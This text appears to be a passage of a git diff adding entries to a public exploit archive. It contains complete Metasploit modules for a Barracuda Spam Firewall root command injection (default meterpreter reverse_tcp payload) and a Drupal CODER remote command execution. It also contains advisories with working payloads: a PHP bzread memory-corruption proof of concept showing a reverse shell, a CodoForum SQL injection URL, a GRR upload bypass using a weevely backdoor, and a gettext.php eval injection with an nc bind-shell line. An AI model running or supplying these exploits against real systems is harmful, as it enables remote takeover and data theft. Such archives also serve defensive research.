datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + handler + end + + + end + +end diff --git a/platforms/linux/remote/40147.rb b/platforms/linux/remote/40147.rb new file mode 100755 index 000000000..8792f301a --- /dev/null +++ b/platforms/linux/remote/40147.rb @@ -0,0 +1,169 @@ +# Exploit Title: Barracuda Spam & Virus Firewall Post Auth Remote Root Exploit +# Date: 07/21/16 +# Exploit Author: xort xort@blacksecurity.org +# Vendor Homepage: https://www.barracuda.com/ +# Software Link: https://www.barracuda.com/landing/pages/spamfirewall/ +# Version: Spam and Virus Firewall <= 5.1.3.007 +# Tested on: Spam & Virus Firewall 5.1.3.007 +# CVE : None. + +require 'msf/core' +require 'date' +require "base64" + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Barracuda Spam & Virus Firewall (bdump.cgi) Post Auth Root Exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Barracuda Spam & Virus firewall firmware version <= 5.1.3.007 by exploiting a + vulnerability in the web administration interface. + By sending a specially crafted request it's possible to inject system + commands while escalating to root do to relaxed sudo configuration on the local + machine. + }, + 'Author' => [ 'xort' ], # disclosure and exploit module + 'References' => [ [ 'none', 'none'] ], + 'Platform' => [ 'linux'], + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, + 'Targets' => [['Spam Firewall firmware: 5x', {}]], + 'DefaultTarget' => 0 )) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Password', "admin" ]), + OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'vars_post' => + { + 'password_clear' => password_clear, + 'real_user' => "", + 'login_state' => "out", + 'enc_key' => enc_key, + 'et' => et, + 'locale' => "en_US", + 'user' => username, + 'password' => Digest::MD5.hexdigest(username+enc_key), + 'enctype' => "MD5", + 'password_entry' => "", + } + }, timeout) + + # get rid of first yank + password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + + # file to replace + sudo_cmd_exec = "/home/product/code/firmware/current/bin/mysql_add_cluster_user.sh" + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + vprint_status( "Running Command...\n" ) + + # random filename to dump too + 'tmp' HAS to be here. + b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + # decoder stubs - tells 'base64' command to decode and dump data to temp file + b64decode1 = "echo \"" + b64decode2 = "\" | base64 -d >" + b64dumpfile + + # base64 - encode with base64 so we can send special chars and multiple lines + cmd = Base64.strict_encode64(cmd) + + # Create injection string. + # a) package the base64 decoder with encoded bytes + # b) attach a chmod +x request to make the script created (b64dumpfile) executable + # c) execute decoded base64 dumpfile + + injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile + + vprint_status( "sending..." ) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/cgi-mod/bdump.cgi", + 'headers' => + { + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Accept-Language' => "en-US,en;q=0.5" + }, + 'vars_get' => { + 'password' => password, + 'et' => et, + 'user' => username, + 'role' => 'admin', + '_dc' => '', + 'bdb' => '`' + injection_string + '`', + 'locale' => 'en_US' + } + }) + end + + def exploit + + # params + timeout = 1550; + + real_user = ""; + et = Time.now.to_i + user = datastore['USERNAME'] + password = datastore['PASSWORD'] + + # do login and get password hash + password_hash, et = do_login(user, password, et) + vprint_status("got password hash: #{password_hash}\n") + sleep(2) + + # clean up hanging prior request + run_command(user, password_hash, et, ("ps -df|grep bdump|awk '{print $2}' | xargs kill -9")) + sleep(5) + + #if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = datastore['CMD'] + + # Encode cmd payload + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" )) + else + # Encode payload to ELF file for deployment + elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + # kill stale calls to bdump from previous exploit calls for re-use + run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" )) + + handler + end + end +end diff --git a/platforms/php/dos/40155.txt b/platforms/php/dos/40155.txt new file mode 100755 index 000000000..64b634900 --- /dev/null +++ b/platforms/php/dos/40155.txt @@ -0,0 +1,324 @@ +PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in +its `bzread()' function: + +php-7.0.8/ext/bz2/bz2.c +,---- +| 364 static PHP_FUNCTION(bzread) +| 365 { +| ... +| 382 ZSTR_LEN(data) = php_stream_read(stream, ZSTR_VAL(data), ZSTR_LEN(data)); +| 383 ZSTR_VAL(data)[ZSTR_LEN(data)] = '\0'; +| 384 +| 385 RETURN_NEW_STR(data); +| 386 } +`---- + +php-7.0.8/ext/bz2/bz2.c +,---- +| 210 php_stream_ops php_stream_bz2io_ops = { +| 211 php_bz2iop_write, php_bz2iop_read, +| 212 php_bz2iop_close, php_bz2iop_flush, +| 213 "BZip2", +| 214 NULL, /* seek */ +| 215 NULL, /* cast */ +| 216 NULL, /* stat */ +| 217 NULL /* set_option */ +| 218 }; +`---- + +php-7.0.8/ext/bz2/bz2.c +,---- +| 136 /* {{{ BZip2 stream implementation */ +| 137 +| 138 static size_t php_bz2iop_read(php_stream *stream, char *buf, size_t count) +| 139 { +| 140 struct php_bz2_stream_data_t *self = (struct php_bz2_stream_data_t *)stream->abstract; +| 141 size_t ret = 0; +| 142 +| 143 do { +| 144 int just_read; +| ... +| 148 just_read = BZ2_bzread(self->bz_file, buf, to_read); +| 149 +| 150 if (just_read < 1) { +| 151 stream->eof = 0 == just_read; +| 152 break; +| 153 } +| 154 +| 155 ret += just_read; +| 156 } while (ret < count); +| 157 +| 158 return ret; +| 159 } +`---- + +The erroneous return values for Bzip2 are as follows: + +bzip2-1.0.6/bzlib.h +,---- +| 038 #define BZ_SEQUENCE_ERROR (-1) +| 039 #define BZ_PARAM_ERROR (-2) +| 040 #define BZ_MEM_ERROR (-3) +| 041 #define BZ_DATA_ERROR (-4) +| 042 #define BZ_DATA_ERROR_MAGIC (-5) +| 043 #define BZ_IO_ERROR (-6) +| 044 #define BZ_UNEXPECTED_EOF (-7) +| 045 #define BZ_OUTBUFF_FULL (-8) +| 046 #define BZ_CONFIG_ERROR (-9) +`---- + +Should the invocation of BZ2_bzread() fail, the loop would simply be +broken out of (bz2.c:152) and execution would continue with bzread() +returning RETURN_NEW_STR(data). + +According to the manual [1], bzread() returns FALSE on error; however +that does not seem to ever happen. + +Due to the way that the bzip2 library deals with state, this could +result in an exploitable condition if a user were to call bzread() after +an error, eg: + +,---- +| $data = ""; +| while (!feof($fp)) { +| $res = bzread($fp); +| if ($res === FALSE) { +| exit("ERROR: bzread()"); +| } +| $data .= $res; +| } +`---- + + +Exploitation +============ + +One way the lack of error-checking could be abused is through +out-of-bound writes that may occur when `BZ2_decompress()' (BZ2_bzread() +-> BZ2_bzRead() -> BZ2_bzDecompress() -> BZ2_decompress()) processes the +`pos' array using user-controlled selectors as indices: + +bzip2-1.0.6/decompress.c +,---- +| 106 Int32 BZ2_decompress ( DState* s ) +| 107 { +| 108 UChar uc; +| 109 Int32 retVal; +| ... +| 113 /* stuff that needs to be saved/restored */ +| 114 Int32 i; +| 115 Int32 j; +| ... +| 118 Int32 nGroups; +| 119 Int32 nSelectors; +| ... +| 167 /*restore from the save area*/ +| 168 i = s->save_i; +| 169 j = s->save_j; +| ... +| 172 nGroups = s->save_nGroups; +| 173 nSelectors = s->save_nSelectors; +| ... +| 195 switch (s->state) { +| ... +| 286 /*--- Now the selectors ---*/ +| 287 GET_BITS(BZ_X_SELECTOR_1, nGroups, 3); +| 288 if (nGroups < 2 || nGroups > 6) RETURN(BZ_DATA_ERROR); +| 289 GET_BITS(BZ_X_SELECTOR_2, nSelectors, 15); +| 290 if (nSelectors < 1) RETURN(BZ_DATA_ERROR); +| 291 for (i = 0; i < nSelectors; i++) { +| 292 j = 0; +| 293 while (True) { +| 294 GET_BIT(BZ_X_SELECTOR_3, uc); +| 295 if (uc == 0) break; +| 296 j++; +| 297 if (j >= nGroups) RETURN(BZ_DATA_ERROR); +| 298 } +| 299 s->selectorMtf[i] = j; +| 300 } +| 301 +| 302 /*--- Undo the MTF values for the selectors. ---*/ +| 303 { +| 304 UChar pos[BZ_N_GROUPS], tmp, v; +| 305 for (v = 0; v < nGroups; v++) pos[v] = v; +| 306 +| 307 for (i = 0; i < nSelectors; i++) { +| 308 v = s->selectorMtf[i]; +| 309 tmp = pos[v]; +| 310 while (v > 0) { pos[v] = pos[v-1]; v--; } +| 311 pos[0] = tmp; +| 312 s->selector[i] = tmp; +| 313 } +| 314 } +| 315 +| ... +| 613 save_state_and_return: +| 614 +| 615 s->save_i = i; +| 616 s->save_j = j; +| ... +| 619 s->save_nGroups = nGroups; +| 620 s->save_nSelectors = nSelectors; +| ... +| 640 return retVal; +| 641 } +`---- + +bzip2-1.0.6/decompress.c +,---- +| 070 #define GET_BIT(lll,uuu) \ +| 071 GET_BITS(lll,uuu,1) +`---- + +bzip2-1.0.6/decompress.c +,---- +| 043 #define GET_BITS(lll,vvv,nnn) \ +| 044 case lll: s->state = lll; \ +| 045 while (True) { \ +| ... +| 065 } +`---- + +If j >= nGroups (decompress.c:297), BZ2_decompress() would save its +state and return BZ_DATA_ERROR. If the caller don't act on the +erroneous retval, but rather invokes BZ2_decompress() again, the saved +state would be restored (including `i' and `j') and the switch statement +would transfer execution to the BZ_X_SELECTOR_3 case -- ie. the +preceding initialization of `i = 0' and `j = 0' would not be executed. + +In pseudocode it could be read as something like: + +,---- +| i = s->save_i; +| j = s->save_j; +| +| switch (s->state) { +| case BZ_X_SELECTOR_2: +| s->state = BZ_X_SELECTOR_2; +| +| nSelectors = get_15_bits... +| +| for (i = 0; i < nSelectors; i++) { +| j = 0; +| while (True) { +| goto iter; +| case BZ_X_SELECTOR_3: +| iter: +| s->state = BZ_X_SELECTOR_3; +| +| uc = get_1_bit... +| +| if (uc == 0) goto done; +| j++; +| if (j >= nGroups) { +| retVal = BZ_DATA_ERROR; +| goto save_state_and_return; +| } +| goto iter; +| done: +| s->selectorMtf[i] = j; +`---- + +An example selector with nGroup=6: +,---- +| 11111111111110 +| ||||| `|||||| `- goto done; s->selectorMtf[i] = 13; +| `´ j++; +| j++; goto save_state_and_return; +| goto iter; +`---- + +Since the selectors are used as indices to `pos' in the subsequent loop, +an `nSelectors' amount of <= 255 - BZ_N_GROUPS bytes out-of-bound writes +could occur if BZ2_decompress() is invoked in spite of a previous error. + +bzip2-1.0.6/decompress.c +,---- +| 304 UChar pos[BZ_N_GROUPS], tmp, v; +| 305 for (v = 0; v < nGroups; v++) pos[v] = v; +| 306 +| 307 for (i = 0; i < nSelectors; i++) { +| 308 v = s->selectorMtf[i]; +| 309 tmp = pos[v]; +| 310 while (v > 0) { pos[v] = pos[v-1]; v--; } +| 311 pos[0] = tmp; +| 312 s->selector[i] = tmp; +| 313 } +`---- + +bzip2-1.0.6/bzlib_private.h +,---- +| 121 #define BZ_N_GROUPS 6 +`---- + + +PoC +=== + +Against FreeBSD 10.3 amd64 with php-fpm 7.0.8 and nginx from the +official repo [2]: + +,---- +| $ nc -v -l 1.2.3.4 5555 & +| Listening on [1.2.3.4] (family 0, port 5555) +| +| $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php +| [*] sending archive to http://target/upload.php (0) +| +| Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479) +| $ fg +| id +| uid=80(www) gid=80(www) groups=80(www) +| +| uname -imrsU +| FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000 +| +| /usr/sbin/pkg query -g "=> %n-%v" php* +| => php70-7.0.8 +| => php70-bz2-7.0.8 +| +| cat upload.php +| +`---- + + +Solution +======== + +This issue has been assigned CVE-2016-5399 and can be mitigated by +calling bzerror() on the handle between invocations of bzip2. + +Another partial solution has been introduced in PHP 7.0.9 and 5.5.38, +whereby the stream is marked as EOF when an error is encountered; +allowing this flaw to be avoided by using feof(). However, the PHP +project considers this to be an issue in the underlying bzip2 +library[3]. + + + +Footnotes +_________ + +[1] [https://secure.php.net/manual/en/function.bzread.php] + +[2] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-5399] + +[3] [https://bugs.php.net/bug.php?id=72613] + + +-- Hans Jerry Illikainen \ No newline at end of file diff --git a/platforms/php/webapps/40149.rb b/platforms/php/webapps/40149.rb new file mode 100755 index 000000000..46593ba39 --- /dev/null +++ b/platforms/php/webapps/40149.rb @@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Drupal CODER Module Remote Command Execution', + 'Description' => %q{ + This module exploits a Remote Command Execution vulnerability in + Drupal CODER Module. Unauthenticated users can execute arbitrary command + under the context of the web server user. + + CODER module doesn't sufficiently validate user inputs in a script file + that has the php extension. A malicious unauthenticated user can make + requests directly to this file to execute arbitrary command. + The module does not need to be enabled for this to be exploited + + This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicky Bloor', # discovery + 'Mehmet Ince ' # msf module + ], + 'References' => + [ + ['URL', 'https://www.drupal.org/node/2765575'] + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 225, + 'DisableNops' => true, + 'BadChars' => "\x00\x2f", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat netcat-e' + }, + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Jul 13 2016', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']), + OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']), + OptPort.new('SRVPORT', [true, 'Bogus web server port to listen']) + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), + ) + if res && res.code == 200 + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def on_request_uri(cli, _request) + print_status("Incoming request detected...") + p = '' + p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}' + p << 's:11:"theme_cache";s:16:"theme_cache_test";' + p << 's:9:"variables";s:14:"variables_test";' + p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}' + p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}' + p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";' + p << 's:7:"new_dir";s:' + p << (payload.encoded.length + 14).to_s + p << ':"f --help && ' + p << payload.encoded + p << ' #";s:4:"name";s:4:"test";}}}' + print_status("Sending payload...") + send_response(cli, p) + end + + def exploit + start_service + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), + 'encode_params' => false, + 'vars_get' => { + 'file' => get_uri + } + ) + stop_service + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40150.txt b/platforms/php/webapps/40150.txt new file mode 100755 index 000000000..037cdb8a3 --- /dev/null +++ b/platforms/php/webapps/40150.txt @@ -0,0 +1,35 @@ +1. Advisory Information +======================================== +Title : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability +Vendor Homepage : https://codoforum.com/ +Remotely Exploitable : Yes +Versions Affected : Prior to 3.2.1 +Tested on : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5 +Vulnerability : SQL Injection (Critical/High) +Date : 23.07.2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman + + +3. Description +======================================== +The script that parses the request URL and displays user profile depending on +the retrieved id does not use proper input validation against SQL injection. + + +4. TECHNICAL DETAILS & POC +======================================== +SQL Injection Proof of Concept +---------------------------------------- +Example for fetching current user database: +http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610))) + + +5. SOLUTION +======================================== +Upgrade to the latest version v3.4 build 19 + diff --git a/platforms/php/webapps/40153.txt b/platforms/php/webapps/40153.txt new file mode 100755 index 000000000..74869cf7e --- /dev/null +++ b/platforms/php/webapps/40153.txt @@ -0,0 +1,183 @@ +# Exploit Title: GRR <= 3.0.0-RC1 (all versions) RCE with privilege escalation through file upload filter bypass (authenticated) + +# Date: January 7th, 2016 +# Exploit Author: kmkz (Bourbon Jean-marie) | @kmkz_security +# Vendor Homepage: http://grr.devome.com/fr/ +# Software Link: http://grr.devome.com/fr/telechargement/category/3-versions-patch?download=7:grr-3-0-0-rc1 +# Version: 3.0.0-RC1 +# Tested on: Windows 2003 R2, PHP 5.2.6 +# Dork: inurl:/grr/ intext:réservation intitle:"GRR" + +# CVSS score: 9.9 +# OVE ID: OVE-20160705-0044 +# CVE ID: Not Requested + +# Credits: http://www.kaizendo.fr/php-how-to-manage-uploaded-image-in-secure-way/ +# Fix: https://github.com/JeromeDevome/GRR/blob/master/admin/admin_config1.php + + +I. APPLICATION +====================================================================================== + +GRR is an open source resources manager tool used in many french public +institutions (not only!). +It permit for example to manage rooms reservations, and so much more. + + +II. ADVISORY +====================================================================================== + + +The application allows administrators to change the enterprise's logo +uploading a new image with .png,.jpg or .gif extension only. + +Once uploaded, image name is "splitted" in an array and renamed with the +name "logo" followed by the extention saved as 2nd array's element. + +This file called for example "logo.jpg" is also "chmoded" as 0666 permission +and directly accessible in image folder (img_grr by default) by all users. + +Besides, the application does only a basic conditional php test +on the extension of the uploaded file. + +It's possible for an attacker to add a second extension that will be +used when the image will be renamed in order to bypass this basic filter +(double extension upload filter bypassing). + +So, a file called backdoor.php.jpg will be renamed as logo.php with +chmod 0666 permissions and could be used by attacker to gain more privileges +on the targeted server (privesc due to bad file permissions and RCE). + +To trigger this vulnerability it is necessary to have an administrator +account on the GRR application. + +This vulnerability is a combination of 3 issues: +- predictable uploaded file names and path +- upload of any kind of file +- bad files permission when we upload this file that permit us to gain +privilegied access. + +Note that it could be "dorkable" in order to find targets ... and sometimes +with trivial admin credentials ;-). + +III. VULNERABLE CODE +====================================================================================== + +snip.. +// Enregistrement du logo + $doc_file = isset($_FILES["doc_file"]) ? $_FILES["doc_file"] : NULL; + if (preg_match("`\.([^.]+)$`", $doc_file['name'], $match)) + { + $ext = strtolower($match[1]); + if ($ext != 'jpg' && $ext != 'png' && $ext != 'gif') // Vulnerability !! Extension are the only "security" test on submitted files !! + { + $msg .= "L\'image n\'a pas pu être enregistrée : les seules extentions autorisées sont gif, png et jpg.\\n"; + $ok = 'no'; +} +else +{ + $dest = '../images/'; + $ok1 = false; + if ($f = @fopen("$dest/.test", "w")) + { + @fputs($f, '<'.'?php $ok1 = true; ?'.'>'); // Hem... + @fclose($f); + include("$dest/.test"); + } + if (!$ok1) + { + $msg .= "L\'image n\'a pas pu être enregistrée : problème d\'écriture sur le répertoire \"images\". Veuillez signaler ce problème à l\'administrateur du serveur.\\n"; + $ok = 'no'; + } + else + { + $ok1 = @copy($doc_file['tmp_name'], $dest.$doc_file['name']); + if (!$ok1) + $ok1 = @move_uploaded_file($doc_file['tmp_name'], $dest.$doc_file['name']); + if (!$ok1) + { + $msg .= "L\'image n\'a pas pu être enregistrée : problème de transfert. Le fichier n\'a pas pu être transféré sur le répertoire IMAGES. Veuillez signaler ce problème à l\'administrateur du serveur.\\n"; + $ok = 'no'; + } + else + { + $tab = explode(".", $doc_file['name']); + $ext = strtolower($tab[1]); + if ($dest.$doc_file['name']!=$dest."logo.".$ext) + { + if (@file_exists($dest."logo.".$ext)) + @unlink($dest."logo.".$ext); + rename($dest.$doc_file['name'],$dest."logo.".$ext); // Vulnerability: if filename is "backdoor.php.jpg" we rename it as "logo.php" !! + + } + @chmod($dest."logo.".$ext, 0666); // Vulnerability: why chmod 0666 on this f****** file!?!? + + $picture_room = "logo.".$ext; + if (!Settings::set("logo", $picture_room)) + { + $msg .= "Erreur lors de l'enregistrement du logo !\\n"; + $ok = 'no'; + } + } + } +} +snip... + +IV. PROOF OF CONCEPT +====================================================================================== + +Generate backdoor: + + kmkz@Tapz:~# weevely generate pass123 /tmp/3lrvs.php + Generated backdoor with password 'pass123' in '/tmp/3lrvs.php' of 1486 byte size. + kmkz@Tapz:~# mv /tmp/3lrvs.php /tmp/3lrvs.php.jpg + + +Login as admin and upload this new 'logo' > Administration > logo + +Enjoy your shell! + + kmkz@Tapz:~# weevely http://server/images/logo.php pass123 + [+] weevely 3.2.0 + + [+] Target: server:F:\server\grr\images + [+] Session: /kmkz/.weevely/sessions/laboratoire.target.fr/logo_1.session + [+] Shell: System shell + + [+] Browse the filesystem or execute commands starts the connection + [+] to the target. Type :help for more information. + + weevely> whoami + autorite nt\system + + + +V. RISK +====================================================================================== +By uploading a script, an attacker may be able to execute arbitrary code +on the server with elevated privileges. + +This flaw may compromise the integrity of the system +(with access to sensitive informations, network shares...) and it may conduce +to full information system's compromise using pivots techniques and imagination! + + +VI. VERSIONS AFFECTED +====================================================================================== +GRR 3.0.0-RC1 is vulnerable (and all previous versions) + + +VII. TIMELINE +====================================================================================== +December 17th, 2015: Vulnerability identification +January 7th, 2016: Vendor and project developers notification +January 11th, 2016: Project developers response +January 15th, 2016: Patch release +January 17th, 2016: Public disclosure + + +VII. LEGAL NOTICES +====================================================================================== +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this advisory. \ No newline at end of file diff --git a/platforms/php/webapps/40154.txt b/platforms/php/webapps/40154.txt new file mode 100755 index 000000000..b9b9c5d13 --- /dev/null +++ b/platforms/php/webapps/40154.txt @@ -0,0 +1,247 @@ +[CVE-2016-6175] gettext.php <= 1.0.12 unauthenticated code execution with POTENTIAL privileges escalation + +# Date: June 25th, 2016 +# Author: kmkz (Bourbon Jean-marie) | @kmkz_security +# Project Homepage: https://launchpad.net/php-gettext/ +# Download: https://launchpad.net/php-gettext/trunk/1.0.12/+download/php-gettext-1.0.12.tar.gz +# Version: 1.0.12 (latest release) +# Tested on: Linux Debian, PHP 5.6.19-2+b1 + +# CVSS: 7.1 +# OVE ID: OVE-20160705-0004 +# CVE ID: CVE-2016-6175 +# OSVDB ID: n/a + +# Thanks: +Lars Michelsen from NagVis project where this bug was discovered and +Danilo Segan from gettext.php team project for their reactivity and professionalism + +# Credits: +https://bugs.launchpad.net/php-gettext/+bug/1606184 +https://github.com/NagVis/nagvis/commit/4fe8672a5aec3467da72b5852ca6d283c15adb53 + +# Fixes: +https://github.com/NagVis/nagvis/blob/4fe8672a5aec3467da72b5852ca6d283c15adb53/share/server/core/ext/php-gettext-1.0.12/gettext.php +https://bugs.launchpad.net/php-gettext/+bug/1606184 + +gettext.php <= 1.0.12 (latest) local/remote code execution with POTENTIAL privileges escalation issue + + +I. APPLICATION + +This library provides PHP functions to read MO files even when gettext is not compiled in or when appropriate locale is not present on the system. +This issue was discovered by auditing Nagvis project source code, however NagVis is not impacted by the following issue. + +NagVis is a visualization addon for the well known network managment system Nagios. +NagVis can be used to visualize Nagios Data, e.g. to display IT processes like a mail system or a network infrastructure. + + +II. ADVISORY + +A possible remote (or local) code execution were identified in the gettext.php file allowing an attacker to gain access on the nagvis host system and/or gain application's privileges throught a specially crafted .mo language file. +The $string variable is not sufficiently sanitized before to be submitted to eval() function (which is dangerous) in select_string() function causing the security issue. + + +III. VULNERABILITY DESCRIPTION + +The gettext_reader() funtion try to test magic number that need to match with .mo files : + +$MAGIC1 = "\x95\x04\x12\xde"; +$MAGIC2 = "\xde\x12\x04\x95"; + +If it seems correct then we'll continue. +We then extract forms from .mo file's header through get_plural_forms() function and check them with a deprecated (since php 5.3.0 because it can be easily bypassed by adding a Null Byte) eregi() regexp function in order to valid they match the following pattern: + +plural-forms: ([^\n]*)\n + +(This regular expression matching have no effect on our payload) + +Next step will be to sanitize the obtained expression string before to practice the fatal eval() on this one. + + +Here is the impacted code snippet : + +snip... +if (eregi("plural-forms: ([^\n]*)\n", $header, $regs)) +$expr = $regs[1]; +else + +$expr = "nplurals=2; plural=n == 1 ? 0 : 1;"; + +$this->pluralheader = $this->sanitize_plural_expression($expr); // The vulnerable function!! +} +snip... + + +The comments presents at the beginning of sanitize_plural_expression() function explain that this one is here to prevent the eval() function attacks called later. + + + +Comments are : + +/** Sanitize plural form expression for use in PHP eval call. +@access private +@return string sanitized plural form expression**/ + +In fact, the security is guaranteed by a "preg_replace" that not permit us to inject specials chars. + +snip... +function sanitize_plural_expression($expr) { + +// Get rid of disallowed characters. +$expr = preg_replace('@[^a-zA-Z0-9_:;\(\)\?\|\&=!<>+*/\%-]@', '', $expr); // « sanitizer » +// Add parenthesis for tertiary '?' operator. + +$expr .= ';'; +$res = ''; +$p = 0; + +for ($i = 0; $i < strlen($expr); $i++) { // indentation ? +$ch = $expr[$i]; + +switch ($ch) { + +case '?': +$res .= ' ? ('; +$p++; + +break; + +case ':': +$res .= ') : ('; + +break; + +case ';': +$res .= str_repeat( ')', $p) . ';'; +$p = 0; + +break; + +default: + +$res .= $ch; + +} +} +return $res; +} +snip... + + +Code snippet from the vulnerable function that execute eval() on the « sanitized string : + + +snip... +$string = $this->get_plural_forms(); +$string = str_replace('nplurals',"\$total",$string); +$string = str_replace("n",$n,$string); +$string = str_replace('plural',"\$plural",$string); + +$total = 0; +$plural = 0; + +eval("$string"); // eval called .... launch my shell baby ! +snip... + + +However, for example (but not only!) we can call system() function with « sh » parameter in order to launch a /bin/sh command on the targeted system and allowing us to gain an interactive shell with application privileges on it. +A real scenario could be that a real attacker overwrites languages files located in the /nagvis-1.8.5/share/frontend/nagvis-js/locale/ directory, in an internal repository, a Docker shared folder or any other folder. +He now just have to wait or to execute the payload himself to obtain his shell, that's why this vulnerability is not so harmless ! + +Note : +Apart from that we could imagine that the attacker transform the $expr variable to obtain an interactive remote shell without eval() and with (maybe) more privileges like this : + +$expr= (`nc -l -p 1337 -e /bin/sh`); // proof of concept and screenshots joined to this advisory + +Like a Perl developer could say: + +« there is more than one way to do it » + + +IV. PROOF OF CONCEPT + +Following PHP code reproduce the exploitation concept base on the 1.0.9 version +(without a crafted .mo file and joined with this advisory). + + ++*/\%-]@', '', $expr);// vuln +$expr = preg_replace('@[^a-zA-Z0-9_:;\(\)\?\|\&=!<>+*/\%-]@', '', $expr);/ + +$expr .= ';'; + + // Add parenthesis for tertiary '?' operator. +$expr .= ';'; +$res = ''; +$p = 0; +for ($i = 0; $i < strlen($expr); $i++) { + $ch = $expr[$i]; + switch ($ch) { + case '?': + $res .= ' ? ('; + $p++; + break; + case ':': + $res .= ') : ('; + break; + case ';': + $res .= str_repeat( ')', $p) . ';'; + $p = 0; + break; + default: + $res .= $ch; + } +} + +// Vulnerable function : +$n= (1); +$total=("1000"); + + if (!is_int($n)) { + throw new InvalidArgumentException( + "Select_string only accepts integers: " . $n); // test sur la version 2 de gettext.php +} + +$string = 